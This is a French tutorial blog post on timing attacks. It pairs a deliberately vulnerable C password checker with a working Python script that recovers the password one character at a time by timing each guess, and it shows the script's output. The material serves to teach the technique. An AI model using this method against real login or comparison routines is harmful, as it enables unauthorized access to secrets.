---
title: "timing attack"
slug: "timing-attack"
description: "Article sur l'exploitation d'une timing attack"
tags: ["python", "c"]
categories: ["hacking"]
layout: "post-with-toc"
---

# Article sur l'exploitation d'une timing attack

Une **timing attack** est une attaque dans laquelle un attaquant tente de compromettre un système en analysant le temps mis pour exécuter certaines opérations.

Chaque opération dans un ordinateur prend du temps, mais certaines opérations peuvent prendre plus de temps que d'autres. C'est sur cette étude que repose cette attaque.

Prenons en exemple un petit morceau de code en langage C vulnérable à ce type d'attaque :

```c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

void some_traitement()
{
	usleep(10000);
}

int main(int argc, char *argv[])
{
	FILE *fp;
	unsigned int u;
	char buffer[32];
	size_t size;

	if (argc != 2) {
		fprintf(stderr, "%s <pass>\n", argv[0]);
		return 1;
	}

	fp = fopen("./pass.txt", "r");

	size = fread(buffer, 1, 17, fp);

	fclose(fp);

	buffer[17] = 0;

	for (u = 0; u < 17; u++) {
		if (argv[1][u] == buffer[u])
			continue;
		else
			some_traitement();
	}

	return 0;
}
```

Après lecture du code, nous comprenons que ce programme prend un argument.\
Cet argument correspond à un mot de passe et plus exactement un mot de passe de 17 caractères.\
Pour vérifier s'il est correct le programme ouvre et lit un fichier contenant le mot de passe réel.\
Puis, il le compare lettre par lettre avec l'argument donné par l'utilisateur.\
Si la lettre ne correspond pas, il exécute un traitement qui met plus de temps que si la lettre correspond.

Dans mon exemple le fichier "pass.txt" contient la chaîne de caractère : **ThePasswordOfVuln**

Il est alors facile de comprendre l'attaque dont voici l'exploit :

```python
#!/usr/bin/env python

import string
from subprocess import call
from time import time

def timer(n):
	s,x,e = time(), call(['./vuln', n]), time()
	return e-s

charset = string.letters+string.digits
n = ''

for i in range(17):
	r = []
	for c in charset:
		r.append(timer(n+c))
	c = charset[r.index(min(r))]
	n += c
	print "Found:", n
```

Voici ce qu'affiche l'exploit une fois exécuté :

```txt
Found: T
Found: Th
Found: The
Found: TheP
Found: ThePa
Found: ThePas
Found: ThePass
Found: ThePassw
Found: ThePasswo
Found: ThePasswor
Found: ThePassword
Found: ThePasswordO
Found: ThePasswordOf
Found: ThePasswordOfV
Found: ThePasswordOfVu
Found: ThePasswordOfVul
Found: ThePasswordOfVuln
```

w00t \o/ !
